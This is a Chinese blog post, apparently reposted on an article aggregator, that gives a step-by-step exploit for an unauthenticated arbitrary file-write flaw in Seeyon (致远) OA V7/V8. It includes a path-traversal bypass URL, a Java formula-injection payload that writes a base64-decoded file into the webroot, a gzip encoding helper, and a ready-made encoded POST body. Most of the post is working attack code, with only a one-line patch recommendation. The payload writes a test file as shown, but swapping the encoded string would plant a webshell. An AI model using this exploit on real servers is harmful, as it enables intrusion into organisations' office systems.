致远OA 文件上传漏洞202010
程序员文章站
2022-03-07 12:44:54
0x00 漏洞产生原因某远未授权访问分析 - 宽字节安全 - 博客园 (cnblogs.com)0x01影响范围V7,V80x02 漏洞利用1.漏洞url:/seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip2.poc:[{'formulaType': 1, 'formulaName': '......
0x00 漏洞产生原因
某远未授权访问分析 - 宽字节安全 - 博客园 (cnblogs.com)
0x01 影响范围
V7,V8
0x02 漏洞利用
1.漏洞url: /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip
2.poc:
[{'formulaType': 1, 'formulaName': 'test', 'formulaExpression': 'String path = "../webapps/seeyon/";
java.io.PrintWriter printWriter2 = new java.io.PrintWriter(path+"test.txt");
String shell = "dGVzdA==";
sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
String decodeString = new String(decoder.decodeBuffer(shell),"UTF-8");
printWriter2.println(decodeString);
printWriter2.close();};test();def static xxx(){'}, '', {}, 'true']
3.使用下面脚本进行gzip编码:
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.net.URLDecoder;
import java.net.URLEncoder;
import java.util.zip.GZIPInputStream;
import java.util.zip.GZIPOutputStream;
public class Gzip {
/**
* @param str:正常的字符串 * @return 压缩字符串 类型为: ³)°K,NIc i£_`Çe# c¦%ÂXHòjyIÅÖ` * @throws IOException
*/
public static String compress(String str) throws IOException {
if (str == null || str.length() == 0) {
return str;
}
ByteArrayOutputStream out = new ByteArrayOutputStream();
GZIPOutputStream gzip = new GZIPOutputStream(out);
gzip.write(str.getBytes());
gzip.close();
return out.toString("ISO-8859-1");
}
/**
* @param str:类型为: ³)°K,NIc i£_`Çe# c¦%ÂXHòjyIÅÖ` * @return 解压字符串 生成正常字符串。 * @throws IOException
*/
public static String uncompress(String str) throws IOException {
if (str == null || str.length() == 0) {
return str;
}
ByteArrayOutputStream out = new ByteArrayOutputStream();
ByteArrayInputStream in = new ByteArrayInputStream(str.getBytes("ISO-8859-1"));
GZIPInputStream gunzip = new GZIPInputStream(in);
byte[] buffer = new byte[256];
int n;
while ((n = gunzip.read(buffer)) >= 0) {
out.write(buffer, 0, n);
} // toString()使用平台默认编码,也可以显式的指定如toString("GBK")
return out.toString();
}
/**
* @param jsUriStr :字符串类型为:%1F%C2%8B%08%00%00%00%00%00%00%03%C2%B3)%C2%B0K%2CNI%03c%20i%C2%A3_%60%C3%87e%03%11%23%C2%82%0Dc%C2%A6%25%C3%82XH%C3%B2jyI%C3%85%05%C3%96%60%1E%00%17%C2%8E%3Dvf%00%00%00 * @return 生成正常字符串 * @throws IOException
*/
public static String unCompressURI(String jsUriStr) throws IOException {
String decodeJSUri = URLDecoder.decode(jsUriStr, "UTF-8");
String gzipCompress = uncompress(decodeJSUri);
return gzipCompress;
}
/**
* @param strData :字符串类型为: 正常字符串 * @return 生成字符串类型为:%1F%C2%8B%08%00%00%00%00%00%00%03%C2%B3)%C2%B0K%2CNI%03c%20i%C2%A3_%60%C3%87e%03%11%23%C2%82%0Dc%C2%A6%25%C3%82XH%C3%B2jyI%C3%85%05%C3%96%60%1E%00%17%C2%8E%3Dvf%00%00%00 * @throws IOException
*/
public static String compress2URI(String strData) throws IOException {
String encodeGzip = compress(strData);
String jsUriStr = URLEncoder.encode(encodeGzip, "UTF-8");
return jsUriStr;
}
}
原作者文章:https://blog.csdn.net/qq_44934581/article/details/89417205
4.post内容:
managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uQ%C3%8DK%C3%830%14%3F%C3%AB_%C3%B1%C3%A8%25-%C3%8E%14ED%1C%3Dl8%C2%BD%C2%89%C2%B0%C2%A9%07%C3%B1%10%C3%9BW%17i%C2%93%C2%90%C2%A4%C2%AE%C2%B3%C3%AC%7F7Y%C2%AA-8sy%1Fy%C2%BF%C2%8F%C3%A4%C2%BDt%C2%A4%C2%94%C2%BAn*%C2%B6%C3%9A*%24%C3%97p6%C2%81%C2%9F%C3%8E%3D%C2%AB%7D%C2%87X4%C2%96%0C%C3%ADE%C2%AB4%1A%C3%83%C2%A5%C3%B0%C2%97K%C2%AB%C2%B9x%07%C3%85%C3%AC%1A2%C2%88%28M7%C3%B8%C3%86%C2%942%C2%A9A%C3%9CJ%C2%91F%C3%93c%08%C3%A7%C3%A8%C2%83%7D2%C3%8A%25%7Dp%10%C3%BB%C2%AC%C2%B9E%0Dj%C3%88%C3%8F%1D%C2%81%C3%80%0D%1C%18%C2%8B%3D%C3%BFI%C3%A4%C2%9DP%C3%9B%C3%9A%28%C3%B9%25%C2%85%C3%9E%C2%80YcUy%07%C3%85%C3%9D%C3%93W1%C3%8B%C2%B2A%17L%23h%C3%8DMN%C3%A7%C2%B3%C3%A5%C3%A2%C3%B2%C3%A2%06sY8%C3%A9%C2%A2%C2%8FA%C3%B5%C3%B0P%C3%BCW%29%C3%80%C3%BA%22%60C%11%C3%B7%C2%844%C3%84yS%C2%96%C2%8E%60o%2C%C2%99D%C2%8F%C2%AB%C3%9B%C3%93%C2%AB%C2%B1%C3%B1%C3%B1%C3%8B%C3%A9%C2%BE%C2%A8D%3C%26%C3%BFo6%C2%AF%C2%A4Agl7%C3%B5%C3%BF%C3%A1%C2%92%02K0%C2%96Y%C2%9EC%C3%9B%C2%B6q%C3%92%C2%91%C2%9D%5B%C2%97%5BY%C3%A7%C2%A3%C3%95%0D%C2%92%C3%97o%C2%B2%C2%9A%5B%C2%90%C3%A9%01%00%00
5.上传的文件路径: /seeyon/test.txt
0x04 修复建议
升级到最新版或者打补丁。
2020年10-12月安全补丁合集
http://service.seeyon.com/patchtools/tp.html#/patchList?type=%E5%AE%89%E5%85%A8%E8%A1%A5%E4%B8%81&id=1
本文地址:https://blog.csdn.net/nex1less/article/details/112546636